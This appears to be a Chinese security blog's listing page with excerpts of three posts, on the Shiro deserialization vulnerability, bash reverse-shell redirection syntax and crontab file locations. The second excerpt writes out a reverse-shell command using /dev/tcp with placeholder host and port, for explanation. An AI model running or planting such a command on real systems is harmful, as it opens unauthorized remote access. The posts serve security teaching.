摘要:
前言 本文为是作者耗时两个通宵写出的Shiro反序列化漏洞原理详解,主要涉及Shiro认证的一些基础概念以及为什么能够这样进行攻击。文章削弱了具体代码以及反序列化部分,主要强调很多新手宝宝看不懂(面试常考)的漏洞版本划分即利用区别等内容。因为反序列化部分其实是一个攻击大类,在利用中也只是把对应攻击链 阅读全文
posted @ 2025-07-15 06:05
Smile3306
阅读(686)
评论(0)
推荐(0)
摘要:
1.简介 本文结合一些参考文章以及作者个人理解解释Linux的bash反弹命令中的 &>、0>&1 若观点有误,欢迎指出! 目标讨论命令:bash -i >& /dev/tcp/ip/port 0>&1 2.基本知识 1. bash bash是什么? 是一种shell。 shell是什么? 此处引用 阅读全文
posted @ 2024-05-22 23:27
Smile3306
阅读(409)
评论(0)
推荐(1)
摘要:
重要文件 全局Crontab配置文件:在 /etc/crontab 文件中 额外的计划任务目录:/etc/cron.d/ (目录下可以放置额外的Crontab文件) 用户级别计划任务: Debian和Ubuntu:/var/spool/cron/crontabs/ CentoOS:/var/spoo 阅读全文
posted @ 2025-03-11 15:17
Smile3306
阅读(115)
评论(0)
推荐(0)
浙公网安备 33010602011771号